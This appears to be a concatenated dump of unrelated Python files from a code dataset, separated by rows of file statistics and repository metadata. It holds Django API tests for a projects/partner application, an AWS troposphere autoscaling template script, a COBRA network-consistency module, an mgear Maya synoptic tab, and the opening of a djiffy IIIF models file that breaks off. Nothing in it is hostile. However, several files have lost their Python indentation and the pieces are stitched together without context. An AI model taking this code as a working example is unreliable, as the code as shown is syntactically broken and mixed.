},
}
],
"agency": office.agency.id,
"agency_office": office.id,
}
def test_create_required(self):
payload = self.base_payload.copy()
url = reverse('projects:open')
create_response = self.client.post(url, data=payload)
self.assertResponseStatusIs(create_response, status.HTTP_400_BAD_REQUEST)
self.assertIn('locations', create_response.data)
payload["locations"][0]['admin_level_1']['name'] = 'asd'
create_response = self.client.post(url, data=payload)
self.assertResponseStatusIs(create_response, status.HTTP_400_BAD_REQUEST)
self.assertIn('locations', create_response.data)
payload["locations"][0]['lat'] = "14.95639"
payload["locations"][0]['lon'] = "-23.62782"
create_response = self.client.post(url, data=payload)
self.assertResponseStatusIs(create_response, status.HTTP_201_CREATED)
def test_create_with_optional_location(self):
payload = self.base_payload.copy()
url = reverse('projects:open')
payload["locations"] = [
{
"admin_level_1": {
"country_code": "PS"
},
}
]
create_response = self.client.post(url, data=payload)
self.assertEqual(create_response.status_code, status.HTTP_201_CREATED)
def test_multiple_locations(self):
payload = self.base_payload.copy()
url = reverse('projects:open')
payload["locations"] = [
{
"admin_level_1": {
"country_code": "CV",
"name": "ASD",
},
'lat': "14.95639",
'lon': "-23.62782"
},
{
"admin_level_1": {
"country_code": "PS"
},
}
]
create_response = self.client.post(url, data=payload)
self.assertEqual(create_response.status_code, status.HTTP_201_CREATED)
@mock.patch('partner.models.Partner.profile_is_complete', lambda _: True)
def test_create_application(self):
eoi = OpenEOIFactory(agency=self.user.agency)
apply_url = reverse('projects:partner-applications', kwargs={'pk': eoi.pk})
partner = PartnerFactory()
user = PartnerMemberFactory(partner=partner).user
self.client.force_login(user)
apply_response = self.client.post(apply_url, data={
'cn': get_new_common_file().id
})
self.assertResponseStatusIs(apply_response, status.HTTP_201_CREATED)
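# Direct-selection CFEIs: creation, verification requirements, publishing, notifications and patching.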
class TestDirectSelectionTestCase(BaseAPITestCase):
user_type = BaseAPITestCase.USER_AGENCY
agency_role = AgencyRole.EDITOR_ADVANCED
quantity = 2
initial_factories = [
AgencyFactory,
AgencyOfficeFactory,
UserFactory,
PartnerFactory,
]
def setUp(self):
super(TestDirectSelectionTestCase, self).setUp()
for partner in Partner.objects.all():
PartnerMemberFactory.create_batch(5, partner=partner)
@override_settings(EMAIL_BACKEND='django.core.mail.backends.locmem.EmailBackend')
def test_create_direct(self):
office = self.user.agency_members.first().office
partners = Partner.objects.all()[:2]
partner1, partner2 = partners
focal_point = AgencyMemberFactory(role=list(VALID_FOCAL_POINT_ROLE_NAMES)[0], office=office).user
direct_selection_payload = {
"applications": [
{
"partner": partner1.id,
"ds_justification_select": ["Loc"],
"justification_reason": "123123"
}, {
"partner": partner2.id,
"ds_justification_select": ["Loc"],
"justification_reason": "1231231241245125"
}],
"eoi": {
"countries": [
{
"country": "FR",
"locations": [{
"admin_level_1": {
"name": "Île-de-France",
"country_code": "FR"
},
"lat": "48.45289",
"lon": "2.65182"
}]
}
],
"specializations": [28, 27],
"title": "1213123",
"focal_points": [focal_point.id],
"description": "123123123",
"goal": "123123123",
"start_date": date.today() + relativedelta(days=1),
"end_date": date.today() + relativedelta(days=15),
"country_code": ["FR"],
"locations": [
{
"admin_level_1": {
"name": "Île-de-France",
"country_code": "FR"
},
"lat": "48.45289",
"lon": "2.65182"
}
],
"agency": office.agency.id,
"agency_office": office.id
}}
url = reverse('projects:direct')
response = self.client.post(url, data=direct_selection_payload)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
for partner in partners:
PartnerVerificationFactory(partner=partner, submitter=self.user)
response = self.client.post(url, data=direct_selection_payload)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertIn('applications', response.data)
direct_selection_payload['applications'].pop()
response = self.client.post(url, data=direct_selection_payload)
self.assertResponseStatusIs(response, status_code=status.HTTP_201_CREATED)
self.assertFalse(response.data['eoi']['sent_for_publishing'])
self.assertFalse(response.data['eoi']['is_published'])
call_command('send_daily_notifications')
selection_emails = list(filter(
lambda msg: NOTIFICATION_DATA[NotificationType.DIRECT_SELECTION_INITIATED]['subject'] in msg.body,
mail.outbox
))
self.assertEqual(len(selection_emails), 0)
mail.outbox = []
partner1_application = partner1.applications.first()
publish_url = reverse('projects:eoi-publish', kwargs={'pk': partner1_application.eoi_id})
self.assertResponseStatusIs(self.client.post(publish_url))
call_command('send_daily_notifications')
selection_emails = list(filter(
lambda msg: NOTIFICATION_DATA[NotificationType.DIRECT_SELECTION_INITIATED]['subject'] in msg.body,
mail.outbox
))
self.assertEqual(len(selection_emails), User.objects.filter(partner_members__partner=partner1).count())
application_url = reverse('projects:application', kwargs={'pk': partner1_application.pk})
accept_payload = {
"did_accept": True,
"did_decline": False
}
update_response = self.client.patch(application_url, data=accept_payload)
self.assertResponseStatusIs(update_response)
call_command('send_daily_notifications')
notification_emails = list(filter(
lambda msg: NOTIFICATION_DATA[NotificationType.CFEI_APPLICATION_WIN]['subject'] in msg.body,
mail.outbox
))
self.assertTrue(len(notification_emails) > 0)
@override_settings(EMAIL_BACKEND='django.core.mail.backends.locmem.EmailBackend')
def test_patch_direct(self):
office = self.user.agency_members.first().office
partner = Partner.objects.first()
direct_selection_payload = {
"applications": [
{
"partner": partner.id,
"ds_justification_select": ["Loc"],
"justification_reason": "123123"
}
],
"eoi": {
"countries": [
{
"country": "FR",
"locations": [{
"admin_level_1": {
"name": "Île-de-France",
"country_code": "FR"
},
"lat": "48.45289",
"lon": "2.65182"
}]
}
],
"specializations": [28, 27],
"title": "1213123",
"focal_points": [
AgencyMemberFactory(role=list(VALID_FOCAL_POINT_ROLE_NAMES)[0], office=office).user.id,
AgencyMemberFactory(role=list(VALID_FOCAL_POINT_ROLE_NAMES)[0], office=office).user.id,
AgencyMemberFactory(role=list(VALID_FOCAL_POINT_ROLE_NAMES)[0], office=office).user.id,
AgencyMemberFactory(role=list(VALID_FOCAL_POINT_ROLE_NAMES)[0], office=office).user.id,
AgencyMemberFactory(role=list(VALID_FOCAL_POINT_ROLE_NAMES)[0], office=office).user.id,
],
"description": "123123123",
"goal": "123123123",
"start_date": date.today() + relativedelta(days=10),
"end_date": date.today() + relativedelta(days=20),
"country_code": ["FR"],
"locations": [
{
"admin_level_1": {
"name": "Île-de-France",
"country_code": "FR"
},
"lat": "48.45289",
"lon": "2.65182"
}
],
"agency": office.agency.id,
"agency_office": office.id
}
}
url = reverse('projects:direct')
PartnerVerificationFactory(partner=partner, submitter=self.user)
response = self.client.post(url, data=direct_selection_payload)
self.assertResponseStatusIs(response, status_code=status.HTTP_201_CREATED)
project_id = partner.applications.first().eoi_id
publish_url = reverse('projects:eoi-publish', kwargs={'pk': project_id})
self.assertResponseStatusIs(self.client.post(publish_url))
project_url = reverse('projects:eoi-detail', kwargs={'pk': project_id})
patch_payload = {
'title': 'new title ASD'
}
patch_response = self.client.patch(project_url, patch_payload)
self.assertResponseStatusIs(patch_response)
self.assertEqual(patch_payload['title'], patch_response.data['title'])
@override_settings(EMAIL_BACKEND='django.core.mail.backends.locmem.EmailBackend')
def test_patch_locations_issue_direct(self):
project = DirectEOIFactory(created_by=self.user)
project_url = reverse('projects:eoi-detail', kwargs={'pk': project.pk})
patch_payload = {
"locations": [
{
"admin_level_1": {
"name": "Elbasan County",
"country_code": "AL"
},
"lat": "41.18271",
"lon": "20.29838"
},
{
"admin_level_1": {
"name": "Gjirokastër County",
"country_code": "AL"
},
"lat": "40.38413",
"lon": "20.38627"
},
{
"admin_level_1": {
"name": "Fier County",
"country_code": "AL"
},
"lat": "40.58468",
"lon": "19.77104"
}
],
}
patch_response = self.client.patch(project_url, patch_payload)
self.assertResponseStatusIs(patch_response)
patch_response = self.client.patch(project_url, data={
'locations': patch_response.data['locations']
})
self.assertResponseStatusIs(patch_response)
@override_settings(EMAIL_BACKEND='django.core.mail.backends.locmem.EmailBackend')
def test_patch_attachments(self):
project = OpenEOIFactory(created_by=self.user)
project_url = reverse('projects:eoi-detail', kwargs={'pk': project.pk})
project_response = self.client.get(project_url)
self.assertResponseStatusIs(project_response)
patch_payload = {
"attachments": project_response.data['attachments'] + [
{
'description': 'Test Description',
'file': get_new_common_file().pk
},
],
}
patch_response = self.client.patch(project_url, patch_payload)
self.assertResponseStatusIs(patch_response)
self.assertEqual(
len(patch_response.data['attachments']),
len(patch_payload['attachments']),
)
for attachment in patch_payload['attachments']:
attachment['description'] = 'TEST'
patch_response = self.client.patch(project_url, patch_payload)
self.assertResponseStatusIs(patch_response)
for attachment in patch_response.data['attachments']:
self.assertEqual(attachment['description'], 'TEST')
patch_payload['attachments'].pop(0)
patch_response = self.client.patch(project_url, patch_payload)
self.assertResponseStatusIs(patch_response)
self.assertEqual(
len(patch_response.data['attachments']),
len(patch_payload['attachments']),
)
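# Publishing an EOI requires an advanced editor role and the publishing user to be its creator.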
class TestEOIPublish(BaseAPITestCase):
quantity = 1
user_type = BaseAPITestCase.USER_AGENCY
agency_role = AgencyRole.READER
initial_factories = [
AgencyFactory,
AgencyOfficeFactory,
UserFactory,
AgencyMemberFactory,
PartnerFactory,
OpenEOIFactory,
]
def test_publish_permission(self):
eoi = EOI.objects.first()
url = reverse('projects:eoi-publish', kwargs={'pk': eoi.pk})
response = self.client.post(url)
self.assertResponseStatusIs(response, status.HTTP_403_FORBIDDEN)
self.set_current_user_role(AgencyRole.EDITOR_ADVANCED.name)
response = self.client.post(url)
self.assertResponseStatusIs(response, status.HTTP_403_FORBIDDEN)
eoi.created_by = self.user
eoi.deadline_date = date.today() + relativedelta(days=7)
eoi.save()
response = self.client.post(url)
self.assertResponseStatusIs(response, status.HTTP_200_OK)
eoi.refresh_from_db()
self.assertTrue(eoi.is_published)
self.assertEqual(eoi.status, CFEI_STATUSES.open)
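# Unsolicited concept notes: draft creation, role-gated publishing, and CN/location updates.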
class TestUCNCreateAndPublish(BaseAPITestCase):
user_type = BaseAPITestCase.USER_PARTNER
partner_role = PartnerRole.EDITOR
initial_factories = [
AgencyFactory,
AgencyOfficeFactory,
UserFactory,
AgencyMemberFactory,
PartnerFactory,
PartnerMemberFactory,
]
def setUp(self):
super(TestUCNCreateAndPublish, self).setUp()
self.base_payload = {
"locations": [
{
"admin_level_1": {
"name": "Île-de-France",
"country_code": "FR"
},
"lat": "48.45289",
"lon": "2.65182"
}
],
'title': 'Save stuff',
'agency': Agency.objects.order_by('?').first().id,
"specializations": [
s.id for s in Specialization.objects.order_by('?')[:2]
],
'cn': get_new_common_file().id
}
def test_ucn_create_and_publish(self):
payload = self.base_payload.copy()
url = reverse('projects:applications-unsolicited')
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_201_CREATED)
ucn = Application.objects.get(id=response.data['id'])
self.assertEqual(ucn.application_status, EXTENDED_APPLICATION_STATUSES.draft)
publish_url = reverse('projects:ucn-manage', kwargs={'pk': ucn.pk})
self.set_current_user_role(PartnerRole.READER.name)
publish_response = self.client.post(publish_url)
self.assertResponseStatusIs(publish_response, status.HTTP_403_FORBIDDEN)
self.set_current_user_role(PartnerRole.EDITOR.name)
publish_response = self.client.post(publish_url)
self.assertResponseStatusIs(publish_response, status.HTTP_200_OK)
ucn.refresh_from_db()
self.assertEqual(ucn.application_status, EXTENDED_APPLICATION_STATUSES.review)
def test_ucn_create_and_update(self):
payload = self.base_payload.copy()
url = reverse('projects:applications-unsolicited')
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_201_CREATED)
ucn = Application.objects.get(id=response.data['id'])
self.assertEqual(ucn.application_status, EXTENDED_APPLICATION_STATUSES.draft)
manage_url = reverse('projects:ucn-manage', kwargs={'pk': ucn.pk})
new_cn = get_new_common_file()
update_response = self.client.patch(manage_url, data={
'cn': new_cn.id
})
self.assertResponseStatusIs(update_response)
new_locations_payload = {
'locations': [
{
"admin_level_1": {"name": "Baghdad", "country_code": 'IQ'},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
},
{
"admin_level_1": {"name": "Paris", "country_code": "FR"},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
},
],
}
update_response = self.client.patch(manage_url, data=new_locations_payload)
self.assertResponseStatusIs(update_response)
self.assertEqual(len(update_response.data['locations']), 2)
partial_update_payload = {
'locations': update_response.data['locations'] + [{
"admin_level_1": {"name": "Paris", "country_code": "FR"},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
}]
}
update_response = self.client.patch(manage_url, data=partial_update_payload)
self.assertResponseStatusIs(update_response)
self.assertEqual(len(update_response.data['locations']), 3)
def test_locations_issue(self):
payload = {
"specializations": [
35
],
"agency": Agency.objects.order_by('?').first().id,
"title": "testucn",
"cn": get_new_common_file().id,
"country_code": [
"AF"
],
"locations": [
{
"admin_level_1": {
"name": "Samangan",
"country_code": "AF"
},
"lat": "35.88378",
"lon": "68.12125"
},
{
"admin_level_1": {
"name": "Ghor",
"country_code": "AF"
},
"lat": "33.46268",
"lon": "65.00114"
}
]
}
url = reverse('projects:applications-unsolicited')
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_201_CREATED)
ucn = Application.objects.get(id=response.data['id'])
manage_url = reverse('projects:ucn-manage', kwargs={'pk': ucn.pk})
update_payload = {
"title": "testucnsdsd",
"agency": Agency.objects.order_by('?').first().id,
"specializations": [
35
],
"country_code": [
"AF"
],
"locations": response.data['locations']
}
update_response = self.client.patch(manage_url, data=update_payload)
self.assertResponseStatusIs(update_response)
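# Exporting a CFEI's detail view as a PDF document.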
class TestEOIPDFExport(BaseAPITestCase):
quantity = 1
user_type = BaseAPITestCase.USER_AGENCY
agency_role = AgencyRole.READER
initial_factories = [
OpenEOIFactory,
]
def test_download_project_pdf(self):
eoi = EOI.objects.first()
url = reverse('projects:eoi-detail', kwargs={'pk': eoi.pk}) + '?export=pdf'
response = self.client.get(url)
self.assertResponseStatusIs(response, status.HTTP_200_OK)
self.assertEqual(response.content_type, 'application/pdf')
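# Only members of the owning agency may view details of a finalized CFEI.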
class TestFinalizedCFEIDetailsViewPermissions(BaseAPITestCase):
def test_applications_details_view(self):
eoi: EOI = FinalizedEOIFactory(agency=UNICEF.model_instance)
winning_application = eoi.applications.filter(did_win=True).first()
application_url = reverse('projects:application', kwargs={"pk": winning_application.id})
review_summary_url = reverse('projects:review-summary', kwargs={"pk": eoi.id})
reviewers_url = reverse('projects:eoi-reviewers-assessments', kwargs={"eoi_id": eoi.id})
applications_url = reverse('projects:applications', kwargs={"pk": eoi.id})
unicef_member = AgencyMemberFactory(
office=AgencyOfficeFactory(agency=UNICEF.model_instance),
role=AgencyRole.EDITOR_ADVANCED.name
)
with self.login_as_user(unicef_member.user):
application_details_response = self.client.get(application_url)
self.assertResponseStatusIs(application_details_response)
review_summary_response = self.client.get(review_summary_url)
self.assertResponseStatusIs(review_summary_response)
reviewers_response = self.client.get(reviewers_url)
self.assertResponseStatusIs(reviewers_response)
applications_response = self.client.get(applications_url)
self.assertResponseStatusIs(applications_response)
wfp_member = AgencyMemberFactory(
office=AgencyOfficeFactory(agency=WFP.model_instance),
role=AgencyRole.EDITOR_ADVANCED.name
)
with self.login_as_user(wfp_member.user):
application_details_response = self.client.get(application_url)
self.assertResponseStatusIs(application_details_response, status.HTTP_403_FORBIDDEN)
review_summary_response = self.client.get(review_summary_url)
self.assertResponseStatusIs(review_summary_response, status.HTTP_403_FORBIDDEN)
reviewers_response = self.client.get(reviewers_url)
self.assertResponseStatusIs(reviewers_response, status.HTTP_403_FORBIDDEN)
applications_response = self.client.get(applications_url)
self.assertResponseStatusIs(applications_response, status.HTTP_403_FORBIDDEN)

#!/usr/bin/python3
# Source: linz/Geodesy-Web-Services, aws/amazonia/test/sys_tests/test_sys_autoscaling_leaf.py (BSD-3-Clause)
from amazonia.classes.asg_config import AsgConfig
from amazonia.classes.amz_autoscaling import AutoscalingLeaf
from amazonia.classes.block_devices_config import BlockDevicesConfig
from amazonia.classes.elb_config import ElbConfig, ElbListenersConfig
from troposphere import Template
def main():
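    """Assemble a sample autoscaling leaf (ELB + ASG) into a troposphere
    CloudFormation template and print it as JSON."""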
userdata = """
#cloud-config
repo_update: true
repo_upgrade: all
packages:
- httpd
runcmd:
- service httpd start
"""
template = Template()
elb_listeners_config = [
ElbListenersConfig(
instance_port='80',
loadbalancer_port='80',
loadbalancer_protocol='HTTP',
instance_protocol='HTTP',
sticky_app_cookie=[]
),
ElbListenersConfig(
instance_port='8080',
loadbalancer_port='8080',
loadbalancer_protocol='HTTP',
instance_protocol='HTTP',
sticky_app_cookie='JSESSION'
)
]
elb_config = ElbConfig(
elb_health_check='TCP:80',
elb_log_bucket=None,
public_unit=False,
ssl_certificate_id=None,
healthy_threshold=10,
unhealthy_threshold=2,
interval=300,
timeout=30,
elb_listeners_config=elb_listeners_config
)
block_devices_config = [BlockDevicesConfig(device_name='/dev/xvda',
ebs_volume_size='15',
ebs_volume_type='gp2',
ebs_encrypted=False,
ebs_snapshot_id=None,
virtual_name=False)
]
asg_config = AsgConfig(
minsize=1,
maxsize=1,
health_check_grace_period=300,
health_check_type='ELB',
image_id='ami-dc361ebf',
instance_type='t2.nano',
userdata=userdata,
iam_instance_profile_arn=None,
block_devices_config=block_devices_config,
simple_scaling_policy_config=None
)
AutoscalingLeaf(
leaf_title='app1',
template=template,
dependencies=['MyDb:5432'],
elb_config=elb_config,
asg_config=asg_config,
availability_zones=['ap-southeast-2a', 'ap-southeast-2b', 'ap-southeast-2c'],
public_cidr={'name': 'PublicIp', 'cidr': '0.0.0.0/0'},
tree_name='tree',
cd_service_role_arn=None,
public_hosted_zone_name=None,
keypair='INSERT_YOUR_KEYPAIR_HERE'
)
print(template.to_json(indent=2, separators=(',', ': ')))
if __name__ == '__main__':
main()
| 28.602151 | 85 | 0.586466 | 262 | 2,660 | 5.610687 | 0.48855 | 0.032653 | 0.051701 | 0.043537 | 0.080272 | 0.080272 | 0.080272 | 0.080272 | 0.080272 | 0 | 0 | 0.027087 | 0.319925 | 2,660 | 92 | 86 | 28.913043 | 0.785517 | 0.006391 | 0 | 0.076923 | 0 | 0 | 0.1162 | 0.009084 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012821 | false | 0 | 0.064103 | 0 | 0.076923 | 0.012821 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad6c9cd967dcc48fb94f9eb7f9f6e7c03c3cbb1a | 5,475 | py | Python | csm4cobra/consistency_analysis.py | migp11/csm4cobra | af1b9ed03935180e936d3faa3b2cb0bf77764255 | [
"MIT"
] | 1 | 2019-07-22T10:08:01.000Z | 2019-07-22T10:08:01.000Z | csm4cobra/consistency_analysis.py | migp11/csm4cobra | af1b9ed03935180e936d3faa3b2cb0bf77764255 | [
"MIT"
] | null | null | null | csm4cobra/consistency_analysis.py | migp11/csm4cobra | af1b9ed03935180e936d3faa3b2cb0bf77764255 | [
"MIT"
] | 1 | 2021-07-02T10:43:51.000Z | 2021-07-02T10:43:51.000Z | import networkx as nx
import pandas as pd
from cobra.flux_analysis import find_blocked_reactions
class UmFinder:
def __init__(self, cobra_model, cc_method='fva', report=True):
self._model = cobra_model
if report:
print("===========================================================")
print("Initializing UmFinder Builder using")
print("Model: %s" % cobra_model.id)
print("- Nº of reactions: %i" % len(self._model.reactions))
print("- Nº of metabolites: %i" % len(self._model.metabolites))
print("\nChecking network consistency (may take some minutes)")
print("Finding blocked reaction using method: %s\n" % cc_method)
self._blocked_reactions = find_blocked_reactions(self.model)
self._gap_metabolites = UmFinder.find_gap_metabolites(self.model, self.blocked_reactions)
self._gap_graph = UmFinder.create_gap_graph(self.model, self._gap_metabolites, self._blocked_reactions)
unconnected_modules = nx.connected_components(self._gap_graph.to_undirected())
self._unconnected_modules = sorted(unconnected_modules, key=lambda x: len(x), reverse=True)
if report:
print("- Nº of blocked reactions: %i" % len(self._blocked_reactions))
print("- Nº of gap metabolites: %i" % len(self._gap_metabolites))
print("- Nº of unconnected modules: %i" % len(self.unconnected_modules))
if len(self.unconnected_modules):
df_ums = self.unconnected_modules_frame()
df_biggest_um = df_ums.node_type[df_ums.um_id == 1]
rxns = df_biggest_um.index[df_biggest_um =='rxn']
mets = df_biggest_um.index[df_biggest_um == 'met']
print("- N of reactions in the biggest unconnected module: %i" % len(rxns))
print("- N of metabolites in the biggest unconnected module: %i" % len(mets))
@property
def model(self):
return self._model
@property
def gap_metabolites(self):
return frozenset(self._gap_metabolites)
@property
def gap_graph(self):
return self._gap_graph
@property
def blocked_reactions(self):
return frozenset(self._blocked_reactions)
@property
def unconnected_modules(self):
return self._unconnected_modules
def update(self):
self._blocked_reactions = find_blocked_reactions(self.model)
self._gap_metabolites = UmFinder.find_gap_metabolites(self.model, self.blocked_reactions)
self._gap_graph = UmFinder.create_gap_graph(self.model, self._gap_metabolites, self._blocked_reactions)
        # nx.connected_component_subgraphs was removed in networkx 2.4;
        # mirror __init__ and work with plain component node sets instead
        unconnected_modules = nx.connected_components(self._gap_graph.to_undirected())
        self._unconnected_modules = sorted(unconnected_modules, key=len, reverse=True)
def unconnected_module_subgraphs(self):
for um in self.unconnected_modules:
yield self.gap_graph.subgraph(um)
def unconnected_modules_frame(self):
columns = ['node_id', 'node_type', 'um_id']
data = {}
counter = 0
for i, um in enumerate(self.unconnected_modules):
for e in um:
if e in self.gap_metabolites:
e_type = 'met'
elif e in self.blocked_reactions:
e_type = 'rxn'
else:
e_type = None
data[counter] = (e, e_type, i+1)
counter += 1
return pd.DataFrame.from_dict(data, orient='index', columns=columns)
@staticmethod
def find_gap_metabolites(model, blocked_reactions):
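        # A metabolite is a "gap" when every reaction it participates in
        # is blocked, i.e. it can never carry flux in the model.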
gap_metabolites = []
for m in model.metabolites:
reactions = set([r.id for r in m.reactions])
if reactions.issubset(blocked_reactions):
gap_metabolites.append(m.id)
return gap_metabolites
@staticmethod
def create_metabolic_graph(cobra_model, directed=True, reactions=None, rev_rxn_label='reversible'):
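        # Build a bipartite reaction/metabolite graph: edges run from
        # substrates into a reaction and from a reaction to its products.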
graph = nx.DiGraph()
if not directed:
graph = nx.Graph()
if not reactions:
reactions = cobra_model.reactions
if not hasattr(reactions[0], 'id'):
reactions = [cobra_model.reactions.get_by_id(r) for r in reactions]
for r in reactions:
graph.add_node(r.id, label=r.id, text=r.id, node_class="rxn", node_id=r.id)
for m in r.metabolites:
if m.id not in graph.nodes():
graph.add_node(m.id, label=m.id, text=m.id, node_class="met", node_id=m.id)
(tail, head) = (r.id, m.id)
if r.get_coefficient(m) < 0:
(tail, head) = (m.id, r.id)
graph.add_edge(tail, head)
graph[tail][head][rev_rxn_label] = r.lower_bound < 0
return graph
@staticmethod
def create_gap_graph(model, gap_metabolites, blocked_reactions):
if hasattr(gap_metabolites[0], 'id'):
gap_metabolites = [m.id for m in gap_metabolites]
if hasattr(blocked_reactions[0], 'id'):
blocked_reactions = [r.id for r in blocked_reactions]
graph = UmFinder.create_metabolic_graph(model)
gap_graph = graph.subgraph(gap_metabolites + blocked_reactions)
return gap_graph
def main():
    import cobra.test  # the cobra package itself is never imported at module level
    model = cobra.test.create_test_model('ecoli')
    um_finder = UmFinder(model)
    return um_finder
if __name__ == '__main__':
    main()
| 36.5 | 111 | 0.622831 | 674 | 5,475 | 4.811573 | 0.186944 | 0.103608 | 0.067838 | 0.019735 | 0.226334 | 0.220783 | 0.220783 | 0.18378 | 0.18378 | 0.125193 | 0 | 0.002249 | 0.269224 | 5,475 | 149 | 112 | 36.744966 | 0.808298 | 0 | 0 | 0.146789 | 0 | 0 | 0.092985 | 0.010778 | 0 | 0 | 0 | 0 | 0 | 1 | 0.119266 | false | 0 | 0.027523 | 0.045872 | 0.238532 | 0.110092 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad6d03303dda7d87d8fea8240570c8e8ff1513e8 | 1,492 | py | Python | python/ymt_synoptics/ymt_secondary_default/__init__.py | yamahigashi/mgear_shifter_components | c4e4c19d8a972e4d78df46f4bdf0b3319da5a792 | [
"MIT"
] | 10 | 2020-01-24T10:10:39.000Z | 2021-09-16T06:20:55.000Z | python/ymt_synoptics/ymt_secondary_default/__init__.py | yamahigashi/mgear_shifter_components | c4e4c19d8a972e4d78df46f4bdf0b3319da5a792 | [
"MIT"
] | null | null | null | python/ymt_synoptics/ymt_secondary_default/__init__.py | yamahigashi/mgear_shifter_components | c4e4c19d8a972e4d78df46f4bdf0b3319da5a792 | [
"MIT"
] | 2 | 2020-01-24T10:11:07.000Z | 2020-04-21T18:17:09.000Z | from mgear.synoptic.tabs import MainSynopticTab
from mgear.vendor.Qt import QtWidgets, QtCore
import pymel.core as pm
from mgear.synoptic import utils
from . import widget
##################################################
# SYNOPTIC TAB WIDGET
##################################################
class SynopticTab(MainSynopticTab, widget.Ui_baker):
description = "Control_List"
name = "Control_List"
# ============================================
# INIT
def __init__(self, parent=None):
super(SynopticTab, self).__init__(self, parent)
def selAll_clicked(self):
# type: () -> None
model = utils.getModel(self)
modifiers = QtWidgets.QApplication.keyboardModifiers()
selAll(model, modifiers)
def selAll(model, modifiers):
"""Select all controlers
Args:
model (PyNode): Rig top node
"""
controlers = utils.getControlers(model)
if modifiers == QtCore.Qt.ShiftModifier: # shift
pm.select(controlers, toggle=True)
    elif modifiers == QtCore.Qt.ControlModifier:  # ctrl
pm.select(cl=True)
rig_models = [item for item in pm.ls(transforms=True)
if item.hasAttr("is_rig")]
for model in rig_models:
controlers = utils.getControlers(model)
pm.select(controlers, toggle=True)
else:
pm.select(controlers)
| 28.150943 | 62 | 0.58445 | 156 | 1,492 | 5.480769 | 0.416667 | 0.037427 | 0.063158 | 0.037427 | 0.20117 | 0.135673 | 0.135673 | 0.135673 | 0.135673 | 0.135673 | 0 | 0 | 0.230563 | 1,492 | 52 | 63 | 28.692308 | 0.744774 | 0.107909 | 0 | 0.275862 | 0 | 0 | 0.029826 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103448 | false | 0 | 0.172414 | 0 | 0.37931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad6d9c7108efa1aec3b7a6ec53a9cb2bc438ba78 | 15,856 | py | Python | djiffy/models.py | Princeton-CDH/djiffy | 53968d280e7208c4bf92d58eee6511032cc7b1ae | [
"Apache-2.0"
] | 5 | 2017-10-17T11:30:58.000Z | 2020-04-26T15:55:52.000Z | djiffy/models.py | Princeton-CDH/djiffy | 53968d280e7208c4bf92d58eee6511032cc7b1ae | [
"Apache-2.0"
] | 6 | 2018-04-26T20:40:19.000Z | 2022-02-16T20:41:36.000Z | djiffy/models.py | Princeton-CDH/djiffy | 53968d280e7208c4bf92d58eee6511032cc7b1ae | [
"Apache-2.0"
] | 1 | 2022-02-16T17:32:16.000Z | 2022-02-16T17:32:16.000Z | from collections import OrderedDict
import json
import os.path
import urllib
from attrdict import AttrMap
from django.conf import settings
from django.db import models
from django.urls import reverse
from django.utils.html import format_html
from jsonfield import JSONField
from piffle import iiif
import rdflib
from rdflib.namespace import DC
import requests
def get_iiif_url(url):
'''Wrapper around :meth:`requests.get` to support conditionally
adding an auth token based on the domain of the request url and
    any **DJIFFY_AUTH_TOKENS** configured in django settings.'''
request_options = {}
AUTH_TOKENS = getattr(settings, 'DJIFFY_AUTH_TOKENS', None)
if AUTH_TOKENS:
domain = urllib.parse.urlparse(url).netloc
if domain in AUTH_TOKENS:
request_options['params'] = {'auth_token': AUTH_TOKENS[domain]}
return requests.get(url, **request_options)
class IIIFException(Exception):
'''Custom exception for IIIF/djiffy specific errors'''
pass
class Manifest(models.Model):
'''Minimal db model representation of an IIIF presentation manifest'''
#: label
label = models.TextField()
#: short id extracted from URI
short_id = models.CharField(max_length=255, unique=True)
#: URI
uri = models.URLField()
#: iiif presentation metadata for display
metadata = JSONField(load_kwargs={'object_pairs_hook': OrderedDict})
#: date local manifest cache was created
created = models.DateField(auto_now_add=True)
#: date local manifest cache was last modified
last_modified = models.DateField(auto_now=True)
#: extra data provided via a 'seeAlso' reference
extra_data = JSONField(load_kwargs={'object_pairs_hook': OrderedDict},
default=OrderedDict)
class Meta:
verbose_name = 'IIIF Manifest'
# add custom permissions; change and delete provided by django
permissions = (
('view_canvas', 'Can view %s' % verbose_name),
)
# todo: metadata? thumbnail references
# - should we cache the actual manifest file?
# TODO: thumbnail doesn't have to be a IIIF image! Support thumbnail url?
def __str__(self):
return self.label or self.short_id
@property
def thumbnail(self):
        '''Canvas flagged as thumbnail for this manifest, if any'''
return self.canvases.filter(thumbnail=True).first()
def get_absolute_url(self):
        '''URL for this manifest within the django site'''
return reverse('djiffy:manifest', args=[self.short_id])
def admin_thumbnail(self):
'''thumbnail for convenience display in admin interface'''
if self.thumbnail:
return self.thumbnail.admin_thumbnail()
admin_thumbnail.short_description = 'Thumbnail'
@property
def logo(self):
'''manifest logo, if there is one'''
return self.extra_data.get('logo', None)
@property
def license(self):
'''manifest license, if there is one'''
return self.extra_data.get('license', None)
@property
def rights_statement_id(self):
'''short id for rightstatement.org license'''
if self.license and 'rightsstatements.org' in self.license:
return self.license.rstrip(' /').split('/')[-2]
